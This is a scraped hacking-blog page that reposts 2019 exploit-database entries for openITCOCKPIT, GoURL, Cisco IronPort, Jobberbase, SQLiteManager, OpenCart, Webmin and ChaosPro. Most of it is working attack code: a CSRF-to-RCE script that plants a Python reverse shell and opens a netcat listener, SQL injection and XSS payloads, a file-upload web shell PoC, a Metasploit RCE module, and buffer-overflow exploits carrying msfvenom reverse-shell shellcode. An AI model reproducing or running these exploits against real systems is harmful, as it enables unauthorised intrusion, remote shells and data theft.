# Exploit Title: openITCOCKPIT 3.6.1-2 - CSRF 2 RCE
# Google Dork: N/A
# Date: 26-08-2019
# Exploit Author: Julian Rittweger
# Vendor Homepage: https://openitcockpit.io/
# Software Link: https://github.com/it-novum/openITCOCKPIT/releases/tag/openITCOCKPIT-3.6.1-2
# Fixed in: 3.7.1 | https://github.com/it-novum/openITCOCKPIT/releases
# Version: 3.6.1-2
# Tested on: Debian 9
# CVE : 2019-10227
# Exploit Requirements: pip3 install bs4 requests && apt install netcat
#!/usr/bin/env python
import requests, urllib3, os
import http.server, socketserver
from bs4 import BeautifulSoup as bs
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
print("""
--
openITCOCKPIT v.3.6.1-2
[CSRF 2 RCE]
--
""")
# Setup values
RHOST = input('[x] Enter IP of remote machine: ')
LHOST = input('[x] Enter IP of local machine: ')
RPORT = int(input('[x] Enter local port (back-connection): '))
LPORT = int(input('[x] Enter local port (payload-hosting): '))
print('[-] Generating CSRF form using the following credentials: "hacked@oicp.app - letmein1337" ..')
# Generate file which serves CSRF payload
pl = open('./index.html', 'w')
# Register HTTP server
handler = http.server.SimpleHTTPRequestHandler
csrf = """
<iframe style="display:none;" name="csrff"></iframe>
<form method="post" action="https://""" + RHOST + """/users/add" target="csrff" style="display:none;">
<input type="text" name="_method" value="POST">
<input type="text" name="data[User][Container][]" value="1">
<input type="text" name="data[ContainerUserMembership][1]" value="2">
<input type="text" name="data[User][usergroup_id]" value="1">
<input type="text" name="data[User][status]" value="1">
<input type="text" name="data[User][email]" value="hacked@oicp.app">
<input type="text" name="data[User][firstname]" value="Mr">
<input type="text" name="data[User][lastname]" value="Nice">
<input type="text" name="data[User][new_password]" value="letmein1337">
<input type="text" name="data[User][confirm_new_password]" value="letmein1337">
<input type="submit">
</form>
<script>
function Redirect() {
window.location="https://""" + RHOST + """/login/logout";
}
document.forms[0].submit();
setTimeout('Redirect()', 3000);
</script>
"""
pl.write(csrf)
pl.close()
httpd = socketserver.TCPServer(("", LPORT), handler)
# Start HTTP server, quit on keyboard interrupt
try:
print('[!] Serving payload at port : ' + str(LPORT) + ', press STRG+C if you registered requests!')
print('[!] Send this URL to a logged-in administrator: http://' + LHOST + ':' + str(LPORT))
httpd.serve_forever()
except KeyboardInterrupt:
httpd.socket.close()
print('\n[-] Starting exploitation ..')
print('[-] Logging in ..')
# Proceed login with generated credentials
c = requests.post('https://' + RHOST + '/login/login', data={'_method' : 'POST', 'data[LoginUser][username]' : 'hacked@oicp.app', 'data[LoginUser][password]' : 'letmein1337'}, verify=False, allow_redirects=False).headers['Set-Cookie']
print('[!] Received cookie: ' + c.split(';')[0])
print('[-] Creating reverse-shell as macro ..')
# Insert a new macro identified as $USER99$
makro = {'_method' : 'POST', 'data[0][Macro][id]' : 1, 'data[0][Macro][name]' : '$USER1$', 'data[0][Macro][value]' : '/opt/openitc/nagios/libexec', 'data[0][Macro][description]' : 'default', 'data[0][Macro][password]' : 0, 'data[1][Macro][id]' : 2, 'data[1][Macro][name]' : '$USER99$', 'data[1][Macro][value]' : "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + LHOST + "\"," + str(RPORT) + "));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", 'data[1][Macro][password]' : 1}
requests.post('https://' + RHOST + '/macros', data=makro, verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]})
print('[-] Inserting macro as command ..')
# Register a new command using the inserted macro
requests.post('https://' + RHOST + '/commands/add/_controller:commands/_action:hostchecks', data={'_method' : 'POST', 'data[Command][command_type]' : 2, 'data[Command][name]' : 'pwned', 'data[Command][command_line]' : '$USER99$'}, verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]})
h = bs(requests.get('https://' + RHOST + '/commands/hostchecks', verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]}).text, 'html.parser')
ids = []
# Fetch current commands by ID
for i in h.find_all('form', {'action': lambda x : x.startswith('/commands/delete')}):
ids.append(i.get('action').split('/')[-1])
print('[!] ID of command identified as: ' + str(ids[-1]))
print('[-] Updating default host ..')
# Update host, using the new malicious "hostcheck" command
sett = {'_method':'POST','data[Host][id]':'1','data[Host][container_id]':'1','data[Host][shared_container]':'','data[Host][hosttemplate_id]':'1','data[Host][name]':'localhost','data[Host][description]':'default+host','data[Host][address]':'127.0.0.1','data[Host][Hostgroup]':'','data[Host][Parenthost]':'','data[Host][notes]':'','data[Host][host_url]':'','data[Host][priority]':'1','data[Host][tags]':'','data[Host][notify_period_id]':'1','data[Host][notification_interval]':'0','data[Host][notification_interval]':'0','data[Host][notify_on_recovery]':'0','data[Host][notify_on_recovery]':'1','data[Host][notify_on_down]':'0','data[Host][notify_on_unreachable]':'0','data[Host][notify_on_unreachable]':'1','data[Host][notify_on_flapping]':'0','data[Host][notify_on_downtime]':'0','data[Host][active_checks_enabled]':'0','data[Host][active_checks_enabled]':'1','data[Host][Contact]':'','data[Host][Contact][]':'1','data[Host][Contactgroup]':'','data[Host][command_id]':ids[-1],'data[Host][check_period_id]':'1','data[Host][max_check_attempts]':'3','data[Host][check_interval]':'120','data[Host][check_interval]':'120','data[Host][retry_interval]':'120','data[Host][retry_interval]':'120','data[Host][flap_detection_enabled]':'0','data[Host][flap_detection_on_up]':'0','data[Host][flap_detection_on_down]':'0', 'data[Host][flap_detection_on_unreachable]' : 0}
requests.post('https://' + RHOST + '/hosts/edit/1/_controller:hosts/_action:browser/_id:1/', data=sett, verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]})
# Refresh host configuration
print('[-] Refreshing host configuration ..')
requests.get('https://' + RHOST + '/exports/launchExport/0.json', verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]}, headers={'X-Requested-With' : 'XMLHttpRequest'})
print('[!] Done! Enjoy your shell (popup in approx. 30s): ')
# We did it!
os.system('nc -lvp ' + str(RPORT))
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863594879
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#Exploit Title: Outlook Password Recovery v2.10 Denial of Service Exploit
# Date: 16.08.2019
# Vendor Homepage:https://www.top-password.com/
# Software Link: https://www.top-password.com/outlook-password-recovery.html
# Exploit Author: Velayutham Selvaraj & Praveen Thiyagarayam (TwinTech Solutions)
# Tested Version: v2.10
# Tested on: Windows 7 x64
# Windows XP SP3
# 1.- Run python code :Outlook Password Recovery.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open OUTLOOK Password Recovery and Click 'EnterKey'
# 4.- Paste the content of EVIL.txt into the Field: 'User Name and
Registration Code'
# 5.- Click 'OK' and you will see a crash.
#!/usr/bin/env python
buffer = "\x41" * 6000
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
<html>
<!--
GoURL Unrestricted Upload Vulnerablity POC by @pouyadarabi
CWE-434
Vulnerable Fucntion: https://github.com/cryptoapi/Bitcoin-Wordpress-Plugin/blob/8aa17068d7ba31a05f66e0ab2bbb55efb0f60017/gourl.php#L5637
Details:
After checking file extention substring was used for file name to select first 95 letter line #5655
So enter file name like "123456789a123456789b123456789c123456789d123456789e123456789f123456789g123456789h123456789i1.php.jpg"
will upload a file with .php extention in website :)
-->
<body>
<!--
Replace http://127.0.0.1/wp/ with target wordpress website
Fill id param in form action to any active download product
-->
<form action="http://127.0.0.1/wp/?page=gourlfile&id=1" method="POST" enctype="multipart/form-data">
<input type="file" name="gourlimage2" />
<input type="submit"/>
</form>
<a href="http://127.0.0.1/wp/wp-content/uploads/gourl/images/i123456789a123456789b123456789c123456789d123456789e123456789f123456789g123456789h123456789i1.php">Shell link</a>
</body>
</html>
#!/usr/bin/perl -w
#
#
# Cisco (Titsco) Email Security Appliance (IronPort) C160 Header 'Host' Injection
#
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use HTTP::CookieJar::LWP;
my $host = shift || 'https://192.168.1.1:443/';
print ("[+] Cisco (Titsco) Email Security Appliance (IronPort) C160 Header 'Host' Injection\n");
print ("===================================================================================\n");
print ("[!] Author: Todor Donev <todor.donev\@gmail.com>\n");
print ("[?] e.g. perl $0 https://target:port/\n") and exit if ($host !~ m/^http/);
my $user_agent = rand_ua("browsers");
my $jar = HTTP::CookieJar::LWP->new();
my $browser = LWP::UserAgent->new(
protocols_allowed => ['http', 'https'],
ssl_opts => { verify_hostname => 0 }
);
$browser->timeout(10);
$browser->cookie_jar($jar);
$browser->agent($user_agent);
my $request = HTTP::Request->new (POST => $host,
[ Content_Type => "application/x-www-form-urlencoded" ,
Referer => $host], " ");
$request->header("Host" => "Header-Injection");
my $content = $browser->request($request);
print $content->headers_as_string();
# Exploit Title: Jobberbase 2.0 CMS - 'jobs-in' SQL Injection
# Google Dork: N/A
# Date: 28, August 2019
# Exploit Author: Suvadip Kar
# Vendor Homepage: http://jobberbase.com/
# Software Link: https://github.com/filipcte/jobberbase/zipball/master
# Version: 2.0
# Tested on: Linux
# CVE : N/A
--------------------------------------------------------------------------------
#POC - SQLi
#Request: http://localhost/[PATH]/jobs/jobs-in/
#Vulnerable Parameter: jobs-in (GET)
#Payload: -4115" UNION ALL SELECT 33,user()-- XYZ
#EXAMPLE: http://localhost/[PATH]/jobs/jobs-in/-4115" UNION ALL SELECT
33,user()-- XYZ
<!--
# Exploit Title: Blind SQL injection in SQLiteManager 1.2.0 (and 1.2.4)
# Date: 17-02-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.sqlitemanager.org/
# Software Link: http://www.sqlitemanager.org/
# Version: SQLiteManager 1.2.0 (and 1.2.4)
# Tested on: All
# CVE : CVE-2019-9083
# Category: webapps
1. Description
SQLiteManager 1.20 allows SQL injection via the /sqlitemanager/main.php
dbsel parameter. NOTE: This product is discontinued.
2. Proof of Concept
Detect:
http://localhost/sqlitemanager/main.php?dbsel=-1%20or%2072%20=%2072
http://localhost/sqlitemanager/main.php?dbsel=-1%20or%2072%20=%2070
Save the next post in a file: sqli.txt
POST /sqlite/main.php?dbsel=-1%20or%2032%20%3d%2030 HTTP/1.1
Content-Length: 191
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=s5uogfet0s4nhr81ihgmg5l4v3;
SQLiteManager_currentTheme=default; SQLiteManager_currentLangue=8;
SQLiteManager_fullText=0; SQLiteManager_HTMLon=0
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
Trident/5.0)
action=save&ColumnList=1&ConditionList=1&trigger=&TriggerAction=FOR%20EACH%20ROW&TriggerCondition=WHEN&TriggerEvent=DELETE&TriggerMoment=BEFORE&TriggerName=kqluvanc&TriggerOn=t1&TriggerStep=1
$ python sqlmap.py -r sqli.txt -p dbsel --level 5 --risk 3 --dump-all
[11:58:27] [INFO] resuming back-end DBMS 'sqlite'
[11:58:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: dbsel (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: dbsel=-4019 OR 7689=7689
---
[11:58:27] [INFO] the back-end DBMS is SQLite
web server operating system: Windows
web application technology: PHP X.X.X, Apache 2.X.X
back-end DBMS: SQLite
[11:58:27] [INFO] sqlmap will dump entries of all tables from all databases
now
[11:58:27] [INFO] fetching tables for database: 'SQLite_masterdb'
[11:58:27] [INFO] fetching number of tables for database 'SQLite_masterdb'
[11:58:27] [WARNING] reflective value(s) found and filtering out
[11:58:27] [WARNING] running in a single-thread mode. Please consider usage
of o
ption '--threads' for faster data retrieval
[11:58:27] [INFO] retrieved: 5
[11:58:27] [INFO] retrieved: database
[11:58:28] [INFO] retrieved: user_function
[11:58:30] [INFO] retrieved: attachment
[11:58:31] [INFO] retrieved: groupes
[11:58:32] [INFO] retrieved: users
.....
.....
.....
3. Solution:
The product is discontinued. Update to last version.
-->
# Exploit Title: Opencart 3.x.x Authenticated Stored XSS
# Date: 08/15/2019
# Exploit Author: Nipun Somani
# Author Web: http://thehackerstore.net
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://github.com/opencart/opencart
# Version: 3.x.x
# Tested on: Debian 9, Windows 10 x64
# CVE : CVE-2019-15081
Description:
The Opencart Version 3.x.x allows editing Source/HTML of the Categories /
Product / Information pages in the admin panel which isn't sanitized to
user input allowing for an attacker to execute arbitrary javascript code
leading to Stored Cross-Site-Scripting(XSS).
Proof-of-Concept(POC):
1. Log-in to admin-panel.
2. Navigate to Catlog and then select any of [Categories or Products or Information] options and and pick any entry or create one.
3. Under description click on Source option and insert your XSS payload.
i.e: "><script>alert("XSS")</script>
4. Now visit the modified page of your public website. And your injected XSS payload will execute.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Webmin < 1.930 Remote Code Execution",
'Description' => %q{
This exploit takes advantage of a code execution issue within the function
unserialise_variable() located in web-lib-funcs.pl, in order to gain root.
The only prerequisite is a valid session id.
},
'License' => MSF_LICENSE,
'Author' =>
[
'James Bercegay', # Vulnerability Discovery
],
'References' =>
[
[ 'URL', 'https://www.gulftech.org/' ]
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => '2019/08/30',
'DefaultTarget' => 0))
register_options(
[
OptString.new('WMPORT', [ true, "Webmin port", '10000']),
OptString.new('WMUSER', [ true, "Webmin username", 'test']),
OptString.new('WMPASS', [ true, "Webmin password", 'test']),
])
end
def check
# Set Webmin port
datastore['RPORT'] = datastore['WMPORT']
# Verbose
print_status("Attempting to login")
# Send login request
res = send_request_cgi(
{
'uri' => '/session_login.cgi',
'method' => 'POST',
'vars_post' =>
{
'user' => datastore['WMUSER'],
'pass' => datastore['WMPASS'],
'save' => '1'
},
'cookie' => "redirect=1; testing=1; sessiontest=1;"
})
# If succesful cookie will be set
if ( res and res.headers['Set-Cookie'] )
# Do we have a valid SID?
if ( /sid=/.match(res.headers['Set-Cookie']) )
# Extract the SID
sid = /sid=([a-z0-9]+);/.match(res.headers['Set-Cookie'])[1]
print_good("Login was successful")
else
# No dice
print_bad("Unable to login")
return Exploit::CheckCode::Safe
end
else
# No dice
print_bad("Unexpected response")
return Exploit::CheckCode::Safe
end
# Verbose
print_status("Checking if host is vulnerable")
# Try to execute arbitrary code
res = send_request_cgi({
'uri' => '/rpc.cgi',
'method' => 'POST',
'headers' =>
{
'Referer' => 'http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s
},
'data' => 'OBJECT CGI;print "Content-Type: text/metasploit\n\n"',
'cookie' => 'redirect=1; testing=1; sessiontest=1; sid=' + sid
})
# If it works our custom Content-Type will be set
if ( res.headers['Content-Type'] and res.headers['Content-Type'] == "text/metasploit" )
# Good
return Exploit::CheckCode::Vulnerable
else
# Bad
return Exploit::CheckCode::Safe
end
end
def exploit
# Set Webmin port
datastore['RPORT'] = datastore['WMPORT']
# Verbose
print_status("Attempting to login")
# Send login request
res = send_request_cgi(
{
'uri' => '/session_login.cgi',
'method' => 'POST',
'vars_post' =>
{
'user' => datastore['WMUSER'],
'pass' => datastore['WMPASS'],
'save' => '1'
},
'cookie' => "redirect=1; testing=1; sessiontest=1;"
})
# If succesful cookie will be set
if ( res and res.headers['Set-Cookie'] )
# Do we have a valid SID?
if ( /sid=/.match(res.headers['Set-Cookie']) )
# Extract the SID
sid = /sid=([a-z0-9]+);/.match(res.headers['Set-Cookie'])[1]
print_good("Login was successful")
else
# No dice
print_bad("Unable to login")
return
end
else
# No dice
print_bad("Unexpected response")
return
end
# Verbose
print_status("Sending selected payload")
# Hex encode payload to prevent problems with the payload getting mangled
hex = '\x' + payload.encoded.scan(/./).map{ |x| x.unpack('H*') }.join('\x')
# Send selected payload
res = send_request_cgi({
'uri' => '/rpc.cgi',
'method' => 'POST',
'headers' =>
{
'Referer' => 'https://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s
},
'data' => 'OBJECT CGI;`' + hex + '`',
'cookie' => 'redirect=1; testing=1; sessiontest=1; sid=' + sid
})
end
end
#!C:\Python27\python.exe
# Title : ChaosPro 2.1
# Twitter : @securitychops
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html
# our egg!
payload = "T00WT00W"
#the payload
payload += (
# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17
# LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00'
"\x89\xe1\xdb\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x42\x53\x30"
"\x33\x30\x43\x30\x55\x30\x4b\x39\x4b\x55\x46\x51\x4f\x30\x32"
"\x44\x4c\x4b\x56\x30\x56\x50\x4c\x4b\x46\x32\x54\x4c\x4c\x4b"
"\x50\x52\x45\x44\x4c\x4b\x34\x32\x37\x58\x44\x4f\x4f\x47\x30"
"\x4a\x36\x46\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c"
"\x44\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x34\x4d\x45\x51\x39"
"\x57\x4b\x52\x4c\x32\x56\x32\x31\x47\x4c\x4b\x46\x32\x32\x30"
"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x30\x4c\x32\x31\x52\x58\x4b"
"\x53\x31\x58\x53\x31\x4e\x31\x36\x31\x4c\x4b\x50\x59\x37\x50"
"\x45\x51\x58\x53\x4c\x4b\x47\x39\x35\x48\x4d\x33\x37\x4a\x30"
"\x49\x4c\x4b\x57\x44\x4c\x4b\x53\x31\x49\x46\x46\x51\x4b\x4f"
"\x4e\x4c\x39\x51\x58\x4f\x54\x4d\x45\x51\x4f\x37\x36\x58\x4d"
"\x30\x33\x45\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d"
"\x56\x44\x42\x55\x5a\x44\x31\x48\x4c\x4b\x46\x38\x31\x34\x35"
"\x51\x4e\x33\x35\x36\x4c\x4b\x34\x4c\x30\x4b\x4c\x4b\x56\x38"
"\x45\x4c\x55\x51\x38\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x38"
"\x50\x4d\x59\x51\x54\x46\x44\x56\x44\x31\x4b\x31\x4b\x43\x51"
"\x31\x49\x50\x5a\x30\x51\x4b\x4f\x4b\x50\x51\x4f\x31\x4f\x51"
"\x4a\x4c\x4b\x32\x32\x4a\x4b\x4c\x4d\x31\x4d\x42\x48\x47\x43"
"\x57\x42\x53\x30\x55\x50\x35\x38\x53\x47\x43\x43\x30\x32\x31"
"\x4f\x31\x44\x33\x58\x30\x4c\x33\x47\x57\x56\x54\x47\x4b\x4f"
"\x49\x45\x48\x38\x4a\x30\x35\x51\x43\x30\x35\x50\x56\x49\x59"
"\x54\x36\x34\x36\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x35\x50"
"\x4b\x4f\x59\x45\x30\x50\x56\x30\x56\x30\x46\x30\x51\x50\x36"
"\x30\x57\x30\x46\x30\x55\x38\x4a\x4a\x54\x4f\x39\x4f\x4b\x50"
"\x4b\x4f\x39\x45\x4d\x47\x42\x4a\x35\x55\x52\x48\x45\x5a\x53"
"\x30\x33\x37\x34\x51\x52\x48\x45\x52\x53\x30\x54\x51\x31\x4c"
"\x4d\x59\x5a\x46\x32\x4a\x52\x30\x50\x56\x46\x37\x32\x48\x5a"
"\x39\x59\x35\x54\x34\x43\x51\x4b\x4f\x39\x45\x4d\x55\x49\x50"
"\x33\x44\x44\x4c\x4b\x4f\x30\x4e\x44\x48\x43\x45\x5a\x4c\x35"
"\x38\x4c\x30\x48\x35\x4f\x52\x36\x36\x4b\x4f\x49\x45\x55\x38"
"\x52\x43\x52\x4d\x52\x44\x43\x30\x4b\x39\x4b\x53\x56\x37\x46"
"\x37\x31\x47\x50\x31\x4a\x56\x33\x5a\x42\x32\x51\x49\x46\x36"
"\x4b\x52\x4b\x4d\x53\x56\x4f\x37\x51\x54\x57\x54\x37\x4c\x53"
"\x31\x43\x31\x4c\x4d\x50\x44\x31\x34\x34\x50\x58\x46\x55\x50"
"\x30\x44\x31\x44\x30\x50\x30\x56\x50\x56\x50\x56\x30\x46\x36"
"\x36\x50\x4e\x31\x46\x50\x56\x50\x53\x31\x46\x43\x58\x52\x59"
"\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50"
"\x4e\x30\x56\x57\x36\x4b\x4f\x36\x50\x45\x38\x44\x48\x4c\x47"
"\x35\x4d\x45\x30\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x48\x35\x59"
"\x32\x30\x56\x42\x48\x4e\x46\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f"
"\x4e\x35\x37\x4c\x54\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b"
"\x50\x52\x55\x33\x35\x4f\x4b\x31\x57\x54\x53\x54\x32\x32\x4f"
"\x43\x5a\x33\x30\x31\x43\x4b\x4f\x4e\x35\x41\x41"
)
#this needs to be a backwards jump to give us room to call stack jump code
jmpbackD0 = "\x40\x75\xD0\x75"
jmpforward06 = "\x40\x75\x06\x75"
# 16 byte shellcode from: https://www.exploit-db.com/exploits/43773/
opencalc = "\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"
# our egghunter shellcode
egghunter = (
"\x66\x81\xca\xff\x0f\x42\x52\x31\xdb\x43"
"\x43\x53\x58\xcd\x2e\x3c\x05\x5a\x74\xec"
"\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xe7"
"\xaf\x75\xe4\xff\xe7"
)
#line containing our payload
line_start = "Username "
line_start += payload + "\n"
#line with our overflow
line_start += "ProjectPath "
junk = line_start
junk += "A" * (2569 - 118 - len(jmpforward06) - len(jmpbackD0))
junk += "A" * (118 - len(egghunter))
# open calc
junk += egghunter
# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpbackD0
#seh address for pop, pop and ret with a 0x00 at the end ...
junk += "\xab\x11\x40"
# write the evil file
with open('C:\\Program Files\\ChaosPro2.1\\ChaosPro.cfg', 'w') as the_file:
the_file.write(junk)
#!C:\Python27\python.exe
# Title : ChaosPro 3.1
# Twitter : @securitychops
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html
# our egg!
payload = "T00WT00W"
# adjust the stack from 00F2FFA6 to 00F2FFA8
payload += "\x83\xC4\x02"
#the payload
payload += (
# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17
# LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00'
"\x89\xe1\xdb\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x42\x53\x30"
"\x33\x30\x43\x30\x55\x30\x4b\x39\x4b\x55\x46\x51\x4f\x30\x32"
"\x44\x4c\x4b\x56\x30\x56\x50\x4c\x4b\x46\x32\x54\x4c\x4c\x4b"
"\x50\x52\x45\x44\x4c\x4b\x34\x32\x37\x58\x44\x4f\x4f\x47\x30"
"\x4a\x36\x46\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c"
"\x44\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x34\x4d\x45\x51\x39"
"\x57\x4b\x52\x4c\x32\x56\x32\x31\x47\x4c\x4b\x46\x32\x32\x30"
"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x30\x4c\x32\x31\x52\x58\x4b"
"\x53\x31\x58\x53\x31\x4e\x31\x36\x31\x4c\x4b\x50\x59\x37\x50"
"\x45\x51\x58\x53\x4c\x4b\x47\x39\x35\x48\x4d\x33\x37\x4a\x30"
"\x49\x4c\x4b\x57\x44\x4c\x4b\x53\x31\x49\x46\x46\x51\x4b\x4f"
"\x4e\x4c\x39\x51\x58\x4f\x54\x4d\x45\x51\x4f\x37\x36\x58\x4d"
"\x30\x33\x45\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d"
"\x56\x44\x42\x55\x5a\x44\x31\x48\x4c\x4b\x46\x38\x31\x34\x35"
"\x51\x4e\x33\x35\x36\x4c\x4b\x34\x4c\x30\x4b\x4c\x4b\x56\x38"
"\x45\x4c\x55\x51\x38\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x38"
"\x50\x4d\x59\x51\x54\x46\x44\x56\x44\x31\x4b\x31\x4b\x43\x51"
"\x31\x49\x50\x5a\x30\x51\x4b\x4f\x4b\x50\x51\x4f\x31\x4f\x51"
"\x4a\x4c\x4b\x32\x32\x4a\x4b\x4c\x4d\x31\x4d\x42\x48\x47\x43"
"\x57\x42\x53\x30\x55\x50\x35\x38\x53\x47\x43\x43\x30\x32\x31"
"\x4f\x31\x44\x33\x58\x30\x4c\x33\x47\x57\x56\x54\x47\x4b\x4f"
"\x49\x45\x48\x38\x4a\x30\x35\x51\x43\x30\x35\x50\x56\x49\x59"
"\x54\x36\x34\x36\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x35\x50"
"\x4b\x4f\x59\x45\x30\x50\x56\x30\x56\x30\x46\x30\x51\x50\x36"
"\x30\x57\x30\x46\x30\x55\x38\x4a\x4a\x54\x4f\x39\x4f\x4b\x50"
"\x4b\x4f\x39\x45\x4d\x47\x42\x4a\x35\x55\x52\x48\x45\x5a\x53"
"\x30\x33\x37\x34\x51\x52\x48\x45\x52\x53\x30\x54\x51\x31\x4c"
"\x4d\x59\x5a\x46\x32\x4a\x52\x30\x50\x56\x46\x37\x32\x48\x5a"
"\x39\x59\x35\x54\x34\x43\x51\x4b\x4f\x39\x45\x4d\x55\x49\x50"
"\x33\x44\x44\x4c\x4b\x4f\x30\x4e\x44\x48\x43\x45\x5a\x4c\x35"
"\x38\x4c\x30\x48\x35\x4f\x52\x36\x36\x4b\x4f\x49\x45\x55\x38"
"\x52\x43\x52\x4d\x52\x44\x43\x30\x4b\x39\x4b\x53\x56\x37\x46"
"\x37\x31\x47\x50\x31\x4a\x56\x33\x5a\x42\x32\x51\x49\x46\x36"
"\x4b\x52\x4b\x4d\x53\x56\x4f\x37\x51\x54\x57\x54\x37\x4c\x53"
"\x31\x43\x31\x4c\x4d\x50\x44\x31\x34\x34\x50\x58\x46\x55\x50"
"\x30\x44\x31\x44\x30\x50\x30\x56\x50\x56\x50\x56\x30\x46\x36"
"\x36\x50\x4e\x31\x46\x50\x56\x50\x53\x31\x46\x43\x58\x52\x59"
"\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50"
"\x4e\x30\x56\x57\x36\x4b\x4f\x36\x50\x45\x38\x44\x48\x4c\x47"
"\x35\x4d\x45\x30\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x48\x35\x59"
"\x32\x30\x56\x42\x48\x4e\x46\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f"
"\x4e\x35\x37\x4c\x54\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b"
"\x50\x52\x55\x33\x35\x4f\x4b\x31\x57\x54\x53\x54\x32\x32\x4f"
"\x43\x5a\x33\x30\x31\x43\x4b\x4f\x4e\x35\x41\x41"
)
#badchars
#\x0a\x1a\x3b\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a
#\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9
#\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8
#\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7
